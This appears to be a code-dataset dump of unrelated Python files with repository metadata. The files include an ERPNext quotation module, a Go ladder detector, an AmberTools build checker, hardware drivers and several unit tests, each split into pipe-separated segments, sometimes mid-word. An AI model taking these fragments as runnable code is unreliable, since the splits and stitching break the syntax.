def set_feature_infos(self, feature_line_infos):
self.feature_info = feature_line_infos[0]
self.feature_expression_info = feature_line_infos[1]
#Methods
def addFileSnapShot(self, key, dict):
self.fileSnapShots[key] = dict
def findFuncId(self, line_num):
# ret
|
urns the identifier of a function given a line number
func_id = 'File_Level'
line_num = int(line_num)
if self.artefact_line_range == True:
if line_num in self.functionIds:
func_id = self.functionIds[line_num]
else:
i = bisect.bisect_right(self.functionLineNums, line_num)
|
func_line = self.functionLineNums[i-1]
func_id = self.functionIds[func_line]
return func_id
def getLineCmtId(self, line_num):
## Retrieve the first file snap
line_num = str(line_num)
file_snapshot = self.getFileSnapShot()
return file_snapshot[line_num]
def getLength(self):
return len(self.getFileSnapShot())
def getIndx(self):
return self.getFileSnapShot().keys()
def addFuncImplLine(self, lineNum, srcLine):
id = self.findFuncId(lineNum)
self.functionImpl[id].append(srcLine)
def findFeatureList(self, line_index):
return self.feature_info.get_line_info(int(line_index) + 1)
def findFeatureExpression(self, line_index):
return self.feature_expression_info.get_line_info(int(line_index) + 1)
|
kressi/erpnext
|
erpnext/buying/doctype/request_for_quotation/request_for_quotation.py
|
Python
|
gpl-3.0
| 10,014 | 0.027062 |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.utils import get_url, cint
from frappe.utils.user import get_user_fullname
from frappe.utils.print_format import download_pdf
from frappe.desk.form.load import get_attachments
from frappe.core.doctype.communication.email import make
from erpnext.accounts.party import get_party_account_currency, get_party_details
from erpnext.stock.doctype.material_request.material_request import set_missing_values
from erpnext.controllers.buying_controller import BuyingController
STANDARD_USERS = ("Guest", "Administrator")
class RequestforQuotation(BuyingController):
def validate(self):
self.validate_duplicate_supplier()
self.validate_common()
self.update_email_id()
def validate_duplicate_supplier(self):
supplier_list = [d.supplier for d in self.suppliers]
if len(supplier_list) != len(set(supplier_list)):
frappe.throw(_("Same supplier has been entered multiple times"))
def validate_common(self):
pc = frappe.get_doc('Purchase Common')
pc.validate_for_items(self)
def update_email_id(self):
for rfq_supplier in self.suppliers:
if not rfq_supplier.email_id:
rfq_supplier.email_id = frappe.db.get_value("Contact", rfq_supplier.contact, "email_id")
def validate_email_id(self, args):
if not args.email_id:
frappe.throw(_("Row {0}: For supplier {0} Email Address is required to send email").format(args.idx, args.supplier))
def on_submit(self):
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
frappe.db.set(self, 'status', 'Cancelled')
def send_to_supplier(self):
for rfq_supplier in self.suppliers:
if rfq_supplier.send_email:
self.validate_email_id(rfq_supplier)
# make new user if required
update_password_link = self.update_supplier_contact(rfq_supplier, self.get_link())
self.update_supplier_part_no(rfq_supplier)
self.supplier_rfq_mail(rfq_supplier, update_password_link, self.get_link())
def get_link(self):
# RFQ link for supplier portal
return get_url("/rfq/" + self.name)
def update_supplier_part_no(self, args):
self.vendor = args.supplier
for it
|
em in self.items:
item.supplier_part_no = frappe.db.get_value('Item Supplier',
{'parent': item.item_code, 'supplier': args.supplier}, 'supplier_part_no')
def update_supplier_contact(self, rfq_supplier, link):
'''Create a new user for the supplier if not set in contact'''
update_password_link = ''
if frappe.db.exists("User", rfq_supplier.email_id):
user = frappe.get_doc("User", rfq_supplier.email_id)
else:
user, update_password_link = self.create_user
|
(rfq_supplier, link)
self.update_contact_of_supplier(rfq_supplier, user)
return update_password_link
def update_contact_of_supplier(self, rfq_supplier, user):
if rfq_supplier.contact:
contact = frappe.get_doc("Contact", rfq_supplier.contact)
else:
contact = frappe.new_doc("Contact")
contact.first_name = rfq_supplier.supplier_name or rfq_supplier.supplier
contact.supplier = rfq_supplier.supplier
if not contact.email_id and not contact.user:
contact.email_id = user.name
contact.user = user.name
contact.save(ignore_permissions=True)
def create_user(self, rfq_supplier, link):
user = frappe.get_doc({
'doctype': 'User',
'send_welcome_email': 0,
'email': rfq_supplier.email_id,
'first_name': rfq_supplier.supplier_name or rfq_supplier.supplier,
'user_type': 'Website User',
'redirect_url': link
})
user.save(ignore_permissions=True)
update_password_link = user.reset_password()
return user, update_password_link
def supplier_rfq_mail(self, data, update_password_link, rfq_link):
full_name = get_user_fullname(frappe.session['user'])
if full_name == "Guest":
full_name = "Administrator"
args = {
'update_password_link': update_password_link,
'message': frappe.render_template(self.message_for_supplier, data.as_dict()),
'rfq_link': rfq_link,
'user_fullname': full_name
}
subject = _("Request for Quotation")
template = "templates/emails/request_for_quotation.html"
sender = frappe.session.user not in STANDARD_USERS and frappe.session.user or None
message = frappe.get_template(template).render(args)
attachments = self.get_attachments()
self.send_email(data, sender, subject, message, attachments)
def send_email(self, data, sender, subject, message, attachments):
make(subject = subject, content=message,recipients=data.email_id,
sender=sender,attachments = attachments, send_email=True,
doctype=self.doctype, name=self.name)["name"]
frappe.msgprint(_("Email sent to supplier {0}").format(data.supplier))
def get_attachments(self):
attachments = [d.name for d in get_attachments(self.doctype, self.name)]
attachments.append(frappe.attach_print(self.doctype, self.name, doc=self))
return attachments
@frappe.whitelist()
def send_supplier_emails(rfq_name):
check_portal_enabled('Request for Quotation')
rfq = frappe.get_doc("Request for Quotation", rfq_name)
if rfq.docstatus==1:
rfq.send_to_supplier()
def check_portal_enabled(reference_doctype):
if not frappe.db.get_value('Portal Menu Item',
{'reference_doctype': reference_doctype}, 'enabled'):
frappe.throw(_("Request for Quotation is disabled to access from portal, for more check portal settings."))
def get_list_context(context=None):
from erpnext.controllers.website_list_for_contact import get_list_context
list_context = get_list_context(context)
list_context["show_sidebar"] = True
return list_context
# This method is used to make supplier quotation from material request form.
@frappe.whitelist()
def make_supplier_quotation(source_name, for_supplier, target_doc=None):
def postprocess(source, target_doc):
target_doc.supplier = for_supplier
args = get_party_details(for_supplier, party_type="Supplier", ignore_permissions=True)
target_doc.currency = args.currency or get_party_account_currency('Supplier', for_supplier, source.company)
target_doc.buying_price_list = args.buying_price_list or frappe.db.get_value('Buying Settings', None, 'buying_price_list')
set_missing_values(source, target_doc)
doclist = get_mapped_doc("Request for Quotation", source_name, {
"Request for Quotation": {
"doctype": "Supplier Quotation",
"validation": {
"docstatus": ["=", 1]
}
},
"Request for Quotation Item": {
"doctype": "Supplier Quotation Item",
"field_map": {
"name": "request_for_quotation_item",
"parent": "request_for_quotation"
},
}
}, target_doc, postprocess)
return doclist
# This method is used to make supplier quotation from supplier's portal.
@frappe.whitelist()
def create_supplier_quotation(doc):
if isinstance(doc, basestring):
doc = json.loads(doc)
try:
sq_doc = frappe.get_doc({
"doctype": "Supplier Quotation",
"supplier": doc.get('supplier'),
"terms": doc.get("terms"),
"company": doc.get("company"),
"currency": doc.get('currency') or get_party_account_currency('Supplier', doc.get('supplier'), doc.get('company')),
"buying_price_list": doc.get('buying_price_list') or frappe.db.get_value('Buying Settings', None, 'buying_price_list')
})
add_items(sq_doc, doc.get('supplier'), doc.get('items'))
sq_doc.flags.ignore_permissions = True
sq_doc.run_method("set_missing_values")
sq_doc.save()
frappe.msgprint(_("Supplier Quotation {0} created").format(sq_doc.name))
return sq_doc.name
except Exception:
return None
def add_items(sq_doc, supplier, items):
for data in items:
if data.get("qty") > 0:
if isinstance(data, dict):
data = frappe._dict(data)
create_rfq_items(sq_doc, supplier, data)
def create_rfq_items(sq_doc, supplier, data):
sq_doc.append('items', {
"item_code": data.item_code,
"item_name": data.item_name,
"description": data.description,
"qty": data.qty,
"rate": data.rate,
"supplier_part_no": frappe.db.get_value("Item Supplier", {'parent': data.item_code, 'supplier': supplier}, "supplier_part_no")
|
m1k3r/gvi-accounts
|
gvi/budgets/migrations/0004_remove_budgetelement_subcategory.py
|
Python
|
mit
| 364 | 0 |
# -*- coding: utf-8 -*-
from __future__
|
import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('budgets', '0003_auto_20150717_0147'),
]
operations = [
migrations.RemoveField(
model_name='budgetelement',
name='subcategory',
),
|
]
|
mgabay/Variable-Size-Vector-Bin-Packing
|
scripts/vbp-optim.py
|
Python
|
gpl-3.0
| 4,279 | 0.00631 |
from vsvbp import container, solver
import argparse, sys, os, re
def parse(inputfile):
""" Parse a file using format from
Brandao et al. [Bin Packing and Related Problems: General Arc-flow Formulation with Graph Compression (2013)]
Format:
d (number of dimensions)
C_1 ... C_d capacities of the bins in each dimension
n number of different items
w^1_1 ... w^d_1 d_1 requirements of item 1 + {demand = number of such items}
...
w^1_n ... w^p_n d_n
Return: a list of items and a typical bin
"""
inp = inputfile
#inp = open(filename, 'r')
dim = int(inp.readline())
#if dim > 50: return False, False
cap = map(int, inp.readline().split())
assert dim == len(cap)
nitems = int(inp.readline())
items = []
i = 0
for line in inp:
req = map(int, line
|
.split())
dem = req.pop()
assert len(req) == dim
items.extend([container.Item(req) for j in xrange(dem)])
i += 1
assert i == nitems
inp.close()
return items, container.Bin(cap)
def natural_sort(l):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
r
|
eturn sorted(l, key = alphanum_key)
def get_subdirectories(directory):
dirs = [os.path.join(directory,name) for name in os.listdir(directory)
if os.path.isdir(os.path.join(directory, name))]
return natural_sort(dirs)
def get_files(directory):
files = [os.path.join(directory,name) for name in os.listdir(directory)
if os.path.isfile(os.path.join(directory, name))]
files.sort()
return natural_sort(files)
def optim_dir(directory, level=0):
files = get_files(directory)
for f in files:
optimize(f, level)
def optim_rec(directory, level=0):
subdir = get_subdirectories(directory)
print " "*level+ "|"+"- "+directory.split('/').pop()
if not subdir:
return optim_dir(directory, level+1)
for d in subdir:
optim_rec(d, level+1)
def optimize(filename, level=0):
fl = open(filename)
items, tbin = parse(fl)
if not items:
fl.close()
return
opt = len(solver.optimize(items, tbin, optimize.dp, optimize.seed).bins)
template = "{0:50}{1:10}"
if level == 0:
st = filename.split('/').pop()
print template.format(st, str(opt))
else:
st = " "*level+"| "+filename.split('/').pop()
print template.format(st, str(opt))
fl.close()
sys.stdout.flush()
def run():
parser = argparse.ArgumentParser(description="Run VSVBP heuristics on given instances")
parser.add_argument('-f', type=argparse.FileType('r'),
help="The path to a file containing the bin packing problem to optimize")
parser.add_argument('-d', help="A directory containing (only) files modeling\
bin packing problems to optimize. Optimize all files in the directory.")
parser.add_argument('-r', action='store_true', help="Recursive. If a directory is provided,\
optimize all files in all final subdirectories.")
parser.add_argument('-u', action='store_true', help="If activated, use dot product heuristics")
parser.add_argument('-s', type=int, help="Set seed to specified value")
args = parser.parse_args()
if not (args.f or args.d):
parser.error('No action requested, add -f or -d')
if args.f and args.d:
parser.error('Too many actions requested, add only -f or -d')
if args.r and not args.d:
sys.stderr.write("Warning recursive argument was specified but")
sys.stderr.write(" no directory was provided. Argument ignored.\n")
if args.d and not os.path.isdir(args.d):
parser.error('Invalid directory')
optimize.dp = args.u
optimize.seed = args.s
if args.f:
items, tbin = parse(args.f)
opt = len(solver.optimize(items, tbin, args.u, args.s).bins)
template = "{0:50}{1:10}"
st = args.f.name.split('/').pop()
print template.format(st, str(opt))
elif not args.r:
optim_dir(args.d)
else:
optim_rec(args.d)
if __name__ == "__main__":
run()
|
myDevicesIoT/Cayenne-Agent
|
myDevices/devices/digital/pcf8574.py
|
Python
|
mit
| 2,274 | 0.006157 |
# Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gove
|
rning permissions and
# limitations under the License.
from myDevices.utils.types import toint
from myDevices.dev
|
ices.i2c import I2C
from myDevices.devices.digital import GPIOPort
class PCF8574(I2C, GPIOPort):
FUNCTIONS = [GPIOPort.IN for i in range(8)]
def __init__(self, slave=0x20):
slave = toint(slave)
if slave in range(0x20, 0x28):
self.name = "PCF8574"
elif slave in range(0x38, 0x40):
self.name = "PCF8574A"
else:
raise ValueError("Bad slave address for PCF8574(A) : 0x%02X not in range [0x20..0x27, 0x38..0x3F]" % slave)
I2C.__init__(self, slave)
GPIOPort.__init__(self, 8)
self.portWrite(0xFF)
self.portRead()
def __str__(self):
return "%s(slave=0x%02X)" % (self.name, self.slave)
def __getFunction__(self, channel):
return self.FUNCTIONS[channel]
def __setFunction__(self, channel, value):
if not value in [self.IN, self.OUT]:
raise ValueError("Requested function not supported")
self.FUNCTIONS[channel] = value
def __digitalRead__(self, channel):
mask = 1 << channel
d = self.readByte()
return (d & mask) == mask
def __portRead__(self):
return self.readByte()
def __digitalWrite__(self, channel, value):
mask = 1 << channel
b = self.readByte()
if value:
b |= mask
else:
b &= ~mask
self.writeByte(b)
def __portWrite__(self, value):
self.writeByte(value)
class PCF8574A(PCF8574):
def __init__(self, slave=0x38):
PCF8574.__init__(self, slave)
|
lablup/sorna-repl
|
vendor/benchmark/minigo/oneoffs/ladder_detector.py
|
Python
|
lgpl-3.0
| 3,787 | 0.003169 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Detect and count number of ladders in a directory of SGF files
Afterw
|
ards it maybe useful to inspect the files or thumbnails
find . -iname '*.sgf' | xargs -P4 -I{} gogui-thumbnailer -size 256 {} {}.png
"""
import sys
sys.path.insert(0, '.')
import os
from collections import Counter, defaultdict
from absl import app
from tqdm import tqdm
from sgfmill import sgf, sgf_moves
import oneoff_utils
ADJACENT_FOR_LADDER = 10
def subtract(a, b):
return (b[0] - a[0], b[1] - a[1])
def manhattanDistance(a, b):
d = subtract(a, b)
return
|
abs(d[0]) + abs(d[1])
def isLadderIsh(game_path):
with open(game_path) as sgf_file:
game_data = sgf_file.read().encode('utf-8')
g = sgf.Sgf_game.from_bytes(game_data)
_, moves = sgf_moves.get_setup_and_moves(g)
mostAdjacent = 0
mostStart = 0
# colorStart, moveStart
cS, mS = -1, (-2, -2)
adjacent = 0
# colorLast, moveLast
cL, mL = cS, mS
for i, (c, m) in enumerate(moves, 1):
if m is None:
continue
newColor = c != cL
dS = subtract(mS, m)
dL = manhattanDistance(mL, m)
diagonalDistance = abs(abs(dS[0]) - abs(dS[1]))
isLadder = ((c == cS and diagonalDistance <= 1 and dL == 2) or
(c != cS and diagonalDistance <= 2 and dL == 1))
if newColor and isLadder:
adjacent += 1
if adjacent > mostAdjacent:
mostAdjacent = adjacent
mostStart = i - adjacent
else:
cS = c
mS = m
adjacent = 0
cL, mL = c, m
if mostAdjacent >= ADJACENT_FOR_LADDER:
return (mostAdjacent, mostStart)
return None
def main(unused_argv):
assert len(unused_argv) == 2, unused_argv
sgf_dir = unused_argv[1]
sgf_dir += '/' * (sgf_dir[-1] != '/')
sgf_files = oneoff_utils.find_and_filter_sgf_files(sgf_dir)
per_folder = defaultdict(lambda: [0,0])
lengths = Counter()
ladders = []
for name in tqdm(sorted(sgf_files)):
folder = os.path.dirname(name[len(sgf_dir):])
per_folder[folder][0] += 1
ladderAt = isLadderIsh(name)
if ladderAt:
ladders.append((name, ladderAt))
lengths[ladderAt[0]] += 1
per_folder[folder][1] += 1
print("Ladderish({}): {}, {}".format(len(ladders), ladderAt, name))
from shutil import copyfile
replace = '/ladder/' + ('yes' if ladderAt else 'no') + '/'
copyfile(name, name.replace('/ladder/', replace))
print()
stars_per = max(max(lengths.values()) / 50, 1)
for length, c in sorted(lengths.items()):
print("{:2d} ({:<4d}): {}".format(length, c, "*" * int(c / stars_per)))
print()
if len(per_folder) > 1:
for folder, counts in sorted(per_folder.items()):
if not folder.endswith('/'): folder += "/"
print("{}/{} ({:.1f}%) {}".format(
counts[1], counts[0], 100 * counts[1] / counts[0], folder))
count = len(ladders)
print("{:3d}/{:<4d} ({:.1f}%) overall".format(
count, len(sgf_files), 100 * count / len(sgf_files)))
if __name__ == "__main__":
app.run(main)
|
Amber-MD/ambertools-conda-build
|
conda_tools/validate_ambertools_build.py
|
Python
|
mit
| 5,502 | 0.000545 |
import os
import sys
import subprocess
from contextlib import contextmanager
import argparse
import glob
ENV_ROOT = 'test_ambertools'
AMBER_VERSION = 'amber17'
def is_conda_package(package_dir):
basename = os.path.basename(package_dir)
return not (basename.startswith('osx') or basename.startswith('linux'))
def run_test(package_dir, amberhome, TEST_SCRIPT):
if is_conda_package(package_dir):
subprocess.check_call('bash {}'.format(TEST_SCRIPT), shell=True)
else:
subprocess.check_call(
"source {}/amber.sh && bash {}".format(amberhome, TEST_SCRIPT),
shell=True)
def install_ambertools(package_dir,
env_name,
tmp_dir='junk_folder',
pyver='2.7'):
if is_conda_package(package_dir):
# conda
subprocess.check_call(
'conda install {} -n {}'.format(package_dir, env_name), shell=True)
else:
amberhome = os.path.abspath(os.path.join(tmp_dir, AMBER_VERSION))
# non-conda
try:
os.mkdir(tmp_dir)
except OSError:
pass
os.chdir(tmp_dir)
if os.path.exists(AMBER_VERSION):
print("Existing {}. Skip untar".format(AMBER_VERSION))
else:
subprocess.check_call(['tar', '-xf', package_dir])
# os.environ['AMBERHOME'] = amberhome
# os.environ['PYTHONPATH'] = os.path.join(amberhome,
# 'lib/python{}/site-packages'.format(pyver))
# os.environ['PATH'] = os.path.join(amberhome, 'bin') + ':' + os.getenv("PATH")
def find_miniconda_root():
command = "conda info --base"
return subprocess.check_output(command, shell=True).decode().strip()
def create_env(env, python_version):
sys.stdout.write('creating {} env'.format(env))
cmlist = 'conda create -n {} python={} numpy nomkl --yes'.format(
env, python_version)
print(cmlist)
subprocess.check_call(cmlist.split())
@contextmanager
def run_env(env_name, python_version):
os.environ['PYTHONPATH'] = ''
ORIG_PATH = os.environ['PATH']
env_path = find_miniconda_root() + '/envs/' + env_name
env_bin_dir = env_path + '/bin/'
os.environ['CONDA_PREFIX'] = env_path
os.environ['PATH'] = env_bin_dir + ':' + ORIG_PATH
if not os.path.exists(find_miniconda_root() + '/envs/' + env_name):
create_env(env_name, python_version)
|
os.system('source activate {}'.format(env_name))
yield
os.system('conda env remove -n {} -y'.format(env_name))
os.environ['PATH'] = ORIG_PATH
def ensure_no_gfortran_local(amberhome):
errors = []
for fn in get_tested_files(amberhome):
cmd = ['otool', '-L', fn]
try:
|
output = subprocess.check_output(
cmd, stderr=subprocess.PIPE).decode()
except subprocess.CalledProcessError:
output = ''
if '/usr/local/gfortran' in output:
errors.append(fn)
return errors
def get_so_files(dest):
cmd = 'find {} -type f -name "*.so"'.format(dest)
print('cmd: {}'.format(cmd))
output = subprocess.check_output(cmd, shell=True)
output = output.decode()
files = [fn for fn in output.split('\n') if fn]
return files
def get_tested_files(dest):
so_files = get_so_files(dest)
# files_in_bin = [os.path.join(dest, 'bin', fn)
# for fn in ['cpptraj', 'sqm', 'mdgx']]
files_in_bin = glob.glob(os.path.join(dest, 'bin/*'))
return [
fn
for fn in so_files + files_in_bin + glob.glob(
os.path.join(dest, 'bin/to_be_dispatched/*')) + glob.glob(
os.path.join(dest, 'lib/*dylib'))
]
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument("package_dir")
parser.add_argument("-py", dest='pyvers')
opt = parser.parse_args(args)
package_dir = opt.package_dir
tmp_dir = 'junk_folder' # only exists if non-conda package
conda_recipe = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', 'conda-ambertools-single-python'))
TEST_SCRIPT = '{}/run_test.sh'.format(conda_recipe)
print('conda_recipe', conda_recipe)
print('run_test', run_test)
pyvers = [
opt.pyvers,
] if opt.pyvers else ['2.7', '3.4', '3.5', '3.6', '3.7']
print('Python versions = {}'.format(pyvers))
print('conda package = {}'.format(is_conda_package(package_dir)))
errors = []
for py in pyvers:
env_name = ENV_ROOT + py
with run_env(env_name, py):
if is_conda_package(package_dir):
amberhome = find_miniconda_root() + '/envs/' + env_name
else:
# do not set CONDA_PREFIX to trigger
# unset PYTHONPATH in run_test.sh in this case.
os.environ['CONDA_PREFIX'] = ''
amberhome = os.path.join(
os.path.abspath(tmp_dir), AMBER_VERSION)
install_ambertools(package_dir, env_name, pyver=py)
if sys.platform.startswith('darwin'):
errors = ensure_no_gfortran_local(amberhome)
run_test(package_dir, amberhome, TEST_SCRIPT)
# check libgfortran
if errors:
print(
"ERROR: Files should not have /usr/local/gfortran in its content"
)
print(errors)
sys.exit(1)
else:
print("libgfortran fixed. Wonderful")
if __name__ == '__main__':
main()
|
dean0x7d/pybinding
|
docs/examples/lattice/checkerboard.py
|
Python
|
bsd-2-clause
| 801 | 0.003745 |
"""Two dimensional checkerboard lattice with real hoppings"""
import pybinding as pb
import matplotlib.pyplot as plt
from math import pi
pb.pltutils.use_style()
def checkerboard(d=0.2, delta=1.1, t=0.6):
lat = pb.Lattice(a1=[d, 0], a
|
2=[0, d])
lat.add_sublattices(
('A', [0, 0], -delta),
('B', [d/2, d/2], delta)
)
lat.add_hoppings(
([ 0, 0], 'A', 'B', t),
([ 0, -1], 'A', 'B', t),
([-1, 0], 'A', 'B', t),
([-1, -1], 'A', 'B', t)
)
return lat
lattice = checkerboard()
lattice.plot()
plt.show()
lattice.plot_brillouin_zone()
plt.show()
model = pb.Model(checkerboard(), pb.translational_symmetry())
solver = pb.solver.lapack(model)
bands = solver.calc_bands([0, 0], [
|
0, 5*pi], [5*pi, 5*pi], [0, 0])
bands.plot()
plt.show()
|
mehtadev17/mapusaurus
|
mapusaurus/api/tests.py
|
Python
|
cc0-1.0
| 4,338 | 0.014292 |
import json
from django.core.urlresolvers import reverse
from django.http import HttpResponseNotFound
from django.test import TestCase
from mock import Mock
from utils import use_GET_in
from api.views import msas, tables
class ConversionTest(TestCase):
def test_use_GET_in(self):
fn, request = Mock(), Mock()
request.GET.lists.return_value = [('param1', [0]), ('param2', [-1])]
# Dictionaries become JSON
fn.return_value = {'a': 1, 'b': 2}
response = use_GET_in(fn, request)
self.assertEqual(json.loads(response.content), {'a': 1, 'b': 2})
self.assertEqual(fn.call_args[0][0], {'param1': [0], 'param2': [-1]})
# Everything else is unaltered
fn.return_value = HttpResponseNotFound('Oh noes')
response = use_GET_in(fn, request)
self.assertEqual(response.status_code, 404)
self.assertEqual(response.content, 'Oh noes')
class ViewsTests(TestCase):
fixtures = ['agency.json', 'fake_msa.json', 'api_tracts.json', 'test_counties.json', 'fake_respondents.json']
def test_api_all_user_errors(self):
resp = self.client.get(reverse('all'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'',
'swLon':'-88.225583',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('all'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'41.597775',
'swLon':'',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
def test_api_msas_user_errors(self):
resp = self.client.get(reverse('msas'))
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('msas'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'',
'swLon':'-88.225583',
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
resp = self.client.get(reverse('msas'), {'neLat':'42.048794',
'neLon':'-87.430698',
'swLat':'41.597775',
|
'swLon':'',
|
'year':'2013',
'action_taken':'1,2,3,4,5',
'lender':'736-4045996'})
self.assertEqual(resp.status_code, 404)
def test_api_msas_endpoint(self):
"""should return a list of MSA ids in view"""
coords = {'neLat': '36.551569', 'neLon':'-78.961487', 'swLat':'35.824494', 'swLon':'-81.828918'}
url = reverse(msas)
resp = self.client.get(url, coords)
result_list = json.loads(resp.content)
self.assertTrue(isinstance(result_list, list))
self.assertContains(resp, '49180')
def test_api_tables_endpoint(self):
"""should return table_data json for a lender/MSA pair"""
params = {'lender': '90000451965', 'metro': '49180'}
url = reverse(tables)
resp = self.client.get(url, params)
result_dict = json.loads(resp.content)
self.assertTrue(isinstance(result_dict, dict))
keys = ['counties', 'msa']
lender_keys = ['hma_pct', 'lma_pct', 'mma_pct', 'lma', 'mma', 'hma', 'lar_total', 'peer_hma_pct', 'peer_lma_pct', 'peer_mma_pct', 'peer_lma', 'peer_mma', 'peer_hma', 'peer_lar_total', 'odds_lma', 'odds_mma', 'odds_hma']
for key in keys:
self.assertTrue(key in result_dict.keys())
for key in lender_keys:
self.assertTrue(key in result_dict['msa'].keys())
self.assertTrue(len(result_dict['msa']) > 0)
|
NicovincX2/Python-3.5
|
Statistiques/Statistique descriptive/Mode (statistiques)/one_mode.py
|
Python
|
gpl-3.0
| 124 | 0.008065 |
# -*- coding: utf-8 -
|
*-
import os
def onemode(values):
return max(set(values)
|
, key=values.count)
os.system("pause")
|
kiyo-masui/SDdata
|
sddata/tests/test_psrfits_to_sdfits.py
|
Python
|
gpl-2.0
| 9,556 | 0.009209 |
"""Unit tests for psrfits_to_sdfits.py."""
import unittest
import sys
import scipy as sp
import numpy.random as rand
import psrfits_to_sdfits as p2s
import kiyopy.custom_exceptions as ce
class TestFormatData(unittest.TestCase) :
def setUp(self) :
self.ntime = 5
self.npol = 4
self.nfreq = 10
self.good_data = sp.empty((self.ntime, self.npol, self.nfreq),
dtype=int)
self.good_data[:,:,:] = sp.reshape(sp.arange(self.ntime*self.nfreq),
(self.ntime, 1, self.nfreq))
self.good_data[:,0,:] += 100
self.good_data[:,1:,:] -= self.ntime*self.nfreq//2
self.raw_data = sp.empty((self.ntime, self.npol, self.nfreq),
dtype=sp.uint8)
self.raw_data[:,0,:] = self.good_data[:,0,:]
self.raw_data.dtype = sp.int8
self.raw_data[:,1:,:] = self.good_data[:,1:,:]
self.raw_data.dtype = sp.uint8
self.raw_data = self.raw_data.flatten()
def test_runs(self) :
p2s.format_data(self.raw_data, self.ntime, self.npol, self.nfreq)
def test_requires_uint(self) :
self.assertRaises(TypeError, p2s.format_data, self.good_data,
self.ntime, self.npol, self.nfreq)
def test_right_answer(self):
reformated = p2s.format_data(self.raw_data, self.ntime, self.npol,
self.nfreq)
self.assertTrue(sp.allclose(reformated, self.good_data))
class TestFoldOnCal(unittest.TestCase) :
def setUp(self):
self.ntime = 2048
self.nfreq = 10
self.data = sp.zeros((self.ntime, 4, self.nfreq))
self.n_bins_cal = 64
# Set channel dependant gain.
self.level = 0.1*(self.nfreq + sp.arange(self.nfreq))
# Add noise.
self.data[:,:,:] += (0.1 * self.level
* rand.randn(self.ntime, 4, self.nfreq))
# Add DC level.
self.dc = 10 * self.level
self.data += self.dc
# First can tran
|
sition.
self.first_trans = rand.randint(0, self.n_bins_cal // 2)
# The following randomly assigns self.neg to -1 or 1.
self.neg = 0
while not self.neg: self.neg = rand.randint(-1, 2)
# First upward edge:
if self.neg == 1:
self.offset = self.first_trans
else:
self.offset = self.first_trans + self.n_bins_cal // 2
self.data
|
[:,0,:] += self.level
for ii in range(self.ntime//self.n_bins_cal) :
s = slice(self.first_trans + ii*self.n_bins_cal, self.first_trans +
(2*ii+1)*self.n_bins_cal//2)
self.data[s, 0, :] += self.neg * self.level
# Transition values and locations.
self.t_slice = slice(self.first_trans, sys.maxint, self.n_bins_cal//2)
self.t_vals = 0.5 + 0.1 * rand.randn(2*self.ntime//self.n_bins_cal,
self.nfreq)
self.t_vals *= - self.level
def test_runs(self) :
p2s.get_cal_mask(self.data, self.n_bins_cal)
def test_right_answer_basic(self) :
first_ind_on, n_blank = p2s.get_cal_mask(self.data, self.n_bins_cal)
self.assertEqual(first_ind_on, (self.offset + 1) % self.n_bins_cal)
self.assertEqual(n_blank, 2)
def test_right_answer_partial(self) :
self.data[self.t_slice, 0, :] += self.t_vals
first_ind_on, n_blank = p2s.get_cal_mask(self.data, self.n_bins_cal)
self.assertEqual(first_ind_on, (self.offset + 1) % self.n_bins_cal)
self.assertEqual(n_blank, 1)
def test_checks_cal_per(self) :
self.assertRaises(ValueError, p2s.get_cal_mask, self.data,
self.n_bins_cal + 1)
def test_fails_to_many_transitions(self) :
self.data[self.t_slice, 0, :] += self.t_vals
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal*2)
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal//2)
def test_fails_any_nan(self) :
self.data[self.t_slice,0,:] = float('nan')
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_offs_in_ons(self) :
self.data[self.t_slice, 0, :] += self.t_vals
s = slice((self.offset + 7) % self.n_bins_cal, sys.maxint,
self.n_bins_cal)
self.data[s, :, :] = self.dc
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_late_on(self) :
self.data[self.t_slice, 0, :] = self.dc
s = slice(self.offset+1, sys.maxint, self.n_bins_cal)
self.data[s, :, :] = self.dc
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fails_to_many_semi_bins(self) :
self.data[self.t_slice, 0, :] += self.t_vals
s = slice((self.offset + 7) % self.n_bins_cal, sys.maxint,
self.n_bins_cal)
self.data[s, :, :] = self.dc + self.level * 0.7
self.assertRaises(ce.DataError, p2s.get_cal_mask, self.data,
self.n_bins_cal)
def test_fast_flagger(self):
for ii in range(self.ntime * self.nfreq * 4 // self.n_bins_cal // 10):
#for ii in range(3):
